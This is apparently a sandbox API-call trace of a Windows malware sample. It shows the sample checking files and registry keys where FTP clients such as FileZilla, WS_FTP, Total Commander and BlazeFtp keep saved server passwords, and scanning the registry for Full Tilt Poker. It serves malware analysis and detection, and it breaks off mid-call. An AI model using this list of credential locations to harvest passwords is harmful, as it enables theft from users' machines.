[0063.837] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x62b650 [0063.837] GetProcessHeap () returned 0x620000 [0063.837] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x634e28 [0063.837] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0063.838] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\LinasFTP\\Site Manager", phkResult=0x634e28 | out: phkResult=0x634e28*=0x0) returned 0x2 [0063.838] GetProcessHeap () returned 0x620000 [0063.838] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x634e28 | out: hHeap=0x620000) returned 1 [0063.838] GetProcessHeap () returned 0x620000 [0063.838] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0063.838] GetProcessHeap () returned 0x620000 [0063.838] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x62b650 | out: hHeap=0x620000) returned 1 [0063.838] GetProcessHeap () returned 0x620000 [0063.838] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63a478 [0063.839] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75960000 [0063.839] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x63a478 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0063.839] GetProcessHeap () returned 0x620000 [0063.839] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f74) returned 0x63b4a8 [0063.840] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.841] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\FileZilla\\Filezilla.xml", arglist=0x19fb9c | out: param_1="C:\\Program Files (x86)\\FileZilla\\Filezilla.xml") returned 46 [0063.841] GetProcessHeap () returned 0x620000 [0063.841] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x638b60 [0063.841] GetProcessHeap () returned 0x620000 [0063.842] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.842] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.842] PathFileExistsW (pszPath="C:\\Program Files (x86)\\FileZilla\\Filezilla.xml") returned 0 [0063.843] GetProcessHeap () returned 0x620000 [0063.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638b60 | out: hHeap=0x620000) returned 1 [0063.843] GetProcessHeap () returned 0x620000 [0063.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0063.843] GetProcessHeap () returned 0x620000 [0063.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f74) returned 0x63b4a8 [0063.844] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.844] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\FileZilla\\filezilla.xml", arglist=0x19fb90 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FileZilla\\filezilla.xml") returned 61 [0063.844] GetProcessHeap () returned 0x620000 [0063.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7e) returned 0x638b60 [0063.844] GetProcessHeap () returned 0x620000 [0063.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.845] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.845] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FileZilla\\filezilla.xml") returned 0 [0063.846] GetProcessHeap () returned 0x620000 [0063.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638b60 | out: hHeap=0x620000) returned 1 [0063.846] GetProcessHeap () returned 0x620000 [0063.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f7c) returned 0x63b4a8 [0063.846] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.847] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\FileZilla\\recentservers.xml", arglist=0x19fb84 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FileZilla\\recentservers.xml") returned 65 [0063.847] GetProcessHeap () returned 0x620000 [0063.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x86) returned 0x63a478 [0063.847] GetProcessHeap () returned 0x620000 [0063.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.848] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.848] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FileZilla\\recentservers.xml") returned 0 [0063.848] GetProcessHeap () returned 0x620000 [0063.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0063.849] GetProcessHeap () returned 0x620000 [0063.849] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f78) returned 0x63b4a8 [0063.849] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.850] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\FileZilla\\sitemanager.xml", arglist=0x19fb78 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FileZilla\\sitemanager.xml") returned 63 [0063.850] GetProcessHeap () returned 0x620000 [0063.850] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x63a478 [0063.850] GetProcessHeap () returned 0x620000 [0063.850] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.851] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.851] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FileZilla\\sitemanager.xml") returned 0 [0063.851] GetProcessHeap () returned 0x620000 [0063.852] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0063.852] GetProcessHeap () returned 0x620000 [0063.852] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63a478 [0063.852] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75960000 [0063.853] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x63a478 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0063.853] GetProcessHeap () returned 0x620000 [0063.853] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f6c) returned 0x63b4a8 [0063.854] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.854] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\Staff-FTP\\sites.ini", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Staff-FTP\\sites.ini") returned 42 [0063.854] GetProcessHeap () returned 0x620000 [0063.854] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x638b60 [0063.854] GetProcessHeap () returned 0x620000 [0063.855] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.856] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.856] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Staff-FTP\\sites.ini") returned 0 [0063.856] GetProcessHeap () returned 0x620000 [0063.856] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638b60 | out: hHeap=0x620000) returned 1 [0063.856] GetProcessHeap () returned 0x620000 [0063.857] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0063.857] GetProcessHeap () returned 0x620000 [0063.857] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f68) returned 0x63b4a8 [0063.858] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.858] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\BlazeFtp\\site.dat", arglist=0x19fb3c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\BlazeFtp\\site.dat") returned 55 [0063.858] GetProcessHeap () returned 0x620000 [0063.858] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x72) returned 0x637f20 [0063.858] GetProcessHeap () returned 0x620000 [0063.859] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.860] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.860] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\BlazeFtp\\site.dat") returned 0 [0063.860] GetProcessHeap () returned 0x620000 [0063.860] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x637f20 | out: hHeap=0x620000) returned 1 [0063.860] GetProcessHeap () returned 0x620000 [0063.860] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x410) returned 0x63a478 [0063.861] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.861] SHGetValueW (in: hkey=0x80000001, pszSubKey="Software\\FlashPeak\\BlazeFtp\\Settings", pszValue="LastPassword", pdwType=0x0, pvData=0x63a478, pcbData=0x19fb3c*=0x104 | out: pdwType=0x0, pvData=0x63a478, pcbData=0x19fb3c*=0x104) returned 0x2 [0063.862] GetProcessHeap () returned 0x620000 [0063.862] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0063.862] GetProcessHeap () returned 0x620000 [0063.862] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63a478 [0063.863] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75960000 [0063.863] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x63a478 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0063.863] GetProcessHeap () returned 0x620000 [0063.863] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f80) returned 0x63b4a8 [0063.864] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.865] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\Fastream NETFile\\My FTP Links", arglist=0x19fb94 | out: param_1="C:\\Program Files (x86)\\Fastream NETFile\\My FTP Links") returned 52 [0063.865] GetProcessHeap () returned 0x620000 [0063.865] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x6c) returned 0x638b60 [0063.865] GetProcessHeap () returned 0x620000 [0063.865] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.866] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.866] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Fastream NETFile\\My FTP Links") returned 0 [0063.866] GetProcessHeap () returned 0x620000 [0063.867] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0063.867] GetProcessHeap () returned 0x620000 [0063.867] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638b60 | out: hHeap=0x620000) returned 1 [0063.867] GetProcessHeap () returned 0x620000 [0063.867] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63a478 [0063.868] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75960000 [0063.868] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x63a478 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0063.868] GetProcessHeap () returned 0x620000 [0063.868] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f82) returned 0x63b4a8 [0063.869] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.870] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\GoFTP\\settings\\Connections.txt", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\GoFTP\\settings\\Connections.txt") returned 53 [0063.870] GetProcessHeap () returned 0x620000 [0063.870] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x6e) returned 0x638b60 [0063.870] GetProcessHeap () returned 0x620000 [0063.870] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.873] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.873] PathFileExistsW (pszPath="C:\\Program Files (x86)\\GoFTP\\settings\\Connections.txt") returned 0 [0063.874] GetProcessHeap () returned 0x620000 [0063.874] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638b60 | out: hHeap=0x620000) returned 1 [0063.874] GetProcessHeap () returned 0x620000 [0063.874] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0063.875] GetProcessHeap () returned 0x620000 [0063.875] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f76) returned 0x63b4a8 [0063.875] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.877] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\Estsoft\\ALFTP\\ESTdb2.dat", arglist=0x19fba0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Estsoft\\ALFTP\\ESTdb2.dat") returned 62 [0063.877] GetProcessHeap () returned 0x620000 [0063.877] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x638b60 [0063.877] GetProcessHeap () returned 0x620000 [0063.877] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.878] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.878] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Estsoft\\ALFTP\\ESTdb2.dat") returned 0 [0063.878] GetProcessHeap () returned 0x620000 [0063.879] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638b60 | out: hHeap=0x620000) returned 1 [0063.879] GetProcessHeap () returned 0x620000 [0063.879] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63a478 [0063.880] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75960000 [0063.881] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x63a478 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0063.881] GetProcessHeap () returned 0x620000 [0063.881] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f6c) returned 0x63b4a8 [0063.882] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.883] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\DeluxeFTP\\sites.xml", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\DeluxeFTP\\sites.xml") returned 42 [0063.883] GetProcessHeap () returned 0x620000 [0063.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x638b60 [0063.883] GetProcessHeap () returned 0x620000 [0063.883] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.884] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.884] PathFileExistsW (pszPath="C:\\Program Files (x86)\\DeluxeFTP\\sites.xml") returned 0 [0063.885] GetProcessHeap () returned 0x620000 [0063.885] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638b60 | out: hHeap=0x620000) returned 1 [0063.885] GetProcessHeap () returned 0x620000 [0063.885] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0063.885] GetProcessHeap () returned 0x620000 [0063.885] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63a478 [0063.886] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75960000 [0063.889] SHGetFolderPathW (in: hwnd=0x0, csidl=36, hToken=0x0, dwFlags=0x0, pszPath=0x63a478 | out: pszPath="C:\\Windows") returned 0x0 [0063.890] GetProcessHeap () returned 0x620000 [0063.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f5c) returned 0x63b4a8 [0063.890] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.891] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\wcx_ftp.ini", arglist=0x19fb98 | out: param_1="C:\\Windows\\wcx_ftp.ini") returned 22 [0063.891] GetProcessHeap () returned 0x620000 [0063.891] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x636dd8 [0063.891] GetProcessHeap () returned 0x620000 [0063.892] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.892] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.892] PathFileExistsW (pszPath="C:\\Windows\\wcx_ftp.ini") returned 0 [0063.892] GetProcessHeap () returned 0x620000 [0063.893] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x636dd8 | out: hHeap=0x620000) returned 1 [0063.893] GetProcessHeap () returned 0x620000 [0063.893] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0063.893] GetProcessHeap () returned 0x620000 [0063.893] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f5c) returned 0x63b4a8 [0063.894] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.894] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\wcx_ftp.ini", arglist=0x19fb8c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\wcx_ftp.ini") returned 49 [0063.894] GetProcessHeap () returned 0x620000 [0063.894] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x66) returned 0x638b60 [0063.894] GetProcessHeap () returned 0x620000 [0063.895] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.895] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.895] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\wcx_ftp.ini") returned 0 [0063.896] GetProcessHeap () returned 0x620000 [0063.896] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638b60 | out: hHeap=0x620000) returned 1 [0063.896] GetProcessHeap () returned 0x620000 [0063.896] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63a478 [0063.897] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75960000 [0063.897] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x63a478 | out: pszPath="C:\\Users\\RDhJ0CNFevzX") returned 0x0 [0063.897] GetProcessHeap () returned 0x620000 [0063.897] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f5c) returned 0x63b4a8 [0063.898] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.898] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\wcx_ftp.ini", arglist=0x19fb80 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\wcx_ftp.ini") returned 33 [0063.898] GetProcessHeap () returned 0x620000 [0063.898] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x46) returned 0x63b218 [0063.898] GetProcessHeap () returned 0x620000 [0063.899] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.899] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.899] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\wcx_ftp.ini") returned 0 [0063.900] GetProcessHeap () returned 0x620000 [0063.900] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b218 | out: hHeap=0x620000) returned 1 [0063.900] GetProcessHeap () returned 0x620000 [0063.900] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0063.900] GetProcessHeap () returned 0x620000 [0063.900] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f6c) returned 0x63b4a8 [0063.901] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.901] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\GHISLER\\wcx_ftp.ini", arglist=0x19fb74 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\GHISLER\\wcx_ftp.ini") returned 57 [0063.901] GetProcessHeap () returned 0x620000 [0063.901] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x76) returned 0x6377a0 [0063.901] GetProcessHeap () returned 0x620000 [0063.902] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.902] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.904] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\GHISLER\\wcx_ftp.ini") returned 0 [0063.904] GetProcessHeap () returned 0x620000 [0063.905] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6377a0 | out: hHeap=0x620000) returned 1 [0063.905] GetProcessHeap () returned 0x620000 [0063.905] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x410) returned 0x63a478 [0063.906] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.906] SHGetValueW (in: hkey=0x80000001, pszSubKey="Software\\Ghisler\\Total Commander", pszValue="FtpIniName", pdwType=0x0, pvData=0x63a478, pcbData=0x19fb74*=0x104 | out: pdwType=0x0, pvData=0x63a478, pcbData=0x19fb74*=0x104) returned 0x2 [0063.906] GetProcessHeap () returned 0x620000 [0063.907] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0063.907] GetProcessHeap () returned 0x620000 [0063.907] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63a478 [0063.908] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75960000 [0063.909] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x63a478 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0063.909] GetProcessHeap () returned 0x620000 [0063.910] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.911] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\FTPGetter\\Profile\\servers.xml", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\FTPGetter\\Profile\\servers.xml") returned 52 [0063.911] GetProcessHeap () returned 0x620000 [0063.912] GetProcessHeap () returned 0x620000 [0063.912] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.912] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.913] PathFileExistsW (pszPath="C:\\Program Files (x86)\\FTPGetter\\Profile\\servers.xml") returned 0 [0063.913] GetProcessHeap () returned 0x620000 [0063.913] GetProcessHeap () returned 0x620000 [0063.913] GetProcessHeap () returned 0x620000 [0063.914] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.914] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\FTPGetter\\servers.xml", arglist=0x19fb94 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FTPGetter\\servers.xml") returned 59 [0063.914] GetProcessHeap () returned 0x620000 [0063.914] GetProcessHeap () returned 0x620000 [0063.915] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.915] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FTPGetter\\servers.xml") returned 0 [0063.915] GetProcessHeap () returned 0x620000 [0063.916] GetProcessHeap () returned 0x620000 [0063.916] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75960000 [0063.917] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x63a478 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0063.917] GetProcessHeap () returned 0x620000 [0063.917] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.919] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\WS_FTP\\WS_FTP.INI", arglist=0x19fb9c | out: param_1="C:\\Program Files (x86)\\WS_FTP\\WS_FTP.INI") returned 40 [0063.919] GetProcessHeap () returned 0x620000 [0063.919] GetProcessHeap () returned 0x620000 [0063.919] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.920] PathFileExistsW (pszPath="C:\\Program Files (x86)\\WS_FTP\\WS_FTP.INI") returned 0 [0063.920] GetProcessHeap () returned 0x620000 [0063.920] GetProcessHeap () returned 0x620000 [0063.920] GetProcessHeap () returned 0x620000 [0063.921] SHGetFolderPathW (in: hwnd=0x0, csidl=36, hToken=0x0, dwFlags=0x0, pszPath=0x63a478 | out: pszPath="C:\\Windows") returned 0x0 [0063.921] GetProcessHeap () returned 0x620000 [0063.923] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\WS_FTP.INI", arglist=0x19fb90 | out: param_1="C:\\Windows\\WS_FTP.INI") returned 21 [0063.923] GetProcessHeap () returned 0x620000 [0063.923] GetProcessHeap () returned 0x620000 [0063.923] PathFileExistsW (pszPath="C:\\Windows\\WS_FTP.INI") returned 0 [0063.924] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x63a478 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0063.925] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\Ipswitch", arglist=0x19fb78 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Ipswitch") returned 46 [0063.926] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Ipswitch") returned 0 [0063.927] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x63a478 | out: pszPath="C:\\Users\\RDhJ0CNFevzX") returned 0x0 [0063.929] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\site.xml", arglist=0x19fba0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\site.xml") returned 30 [0063.929] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\site.xml") returned 0 [0063.948] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x634e28 [0063.950] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software", phkResult=0x634e28 | out: phkResult=0x634e28*=0x210) returned 0x0 [0063.950] GetProcessHeap () returned 0x620000 [0063.950] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x410) returned 0x63a478 [0063.951] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.951] SHEnumKeyExW (in: hkey=0x210, dwIndex=0x0, pszName=0x63a478, pcchName=0x19fb90 | out: pszName="AppDataLow", pcchName=0x19fb90) returned 0x0 [0063.951] GetProcessHeap () returned 0x620000 [0063.951] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x638dc8 [0063.952] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0063.953] RegOpenKeyW (in: hKey=0x210, lpSubKey="AppDataLow", phkResult=0x638dc8 | out: phkResult=0x638dc8*=0x204) returned 0x0 [0063.954] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.954] StrStrW (lpFirst="AppDataLow", lpSrch="Full Tilt Poker") returned 0x0 [0063.955] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0063.955] RegCloseKey (hKey=0x204) returned 0x0 [0063.955] GetProcessHeap () returned 0x620000 [0063.955] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638dc8 | out: hHeap=0x620000) returned 1 [0063.956] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.956] SHEnumKeyExW (in: hkey=0x210, dwIndex=0x1, pszName=0x63a478, pcchName=0x19fb90 | out: pszName="IM Providers", pcchName=0x19fb90) returned 0x0 [0063.957] GetProcessHeap () returned 0x620000 [0063.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x638dc8 [0063.958] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0063.958] RegOpenKeyW (in: hKey=0x210, lpSubKey="IM Providers", phkResult=0x638dc8 | out: phkResult=0x638dc8*=0x204) returned 0x0 [0063.959] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.960] StrStrW (lpFirst="IM Providers", lpSrch="Full Tilt Poker") returned 0x0 [0063.960] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0063.961] RegCloseKey 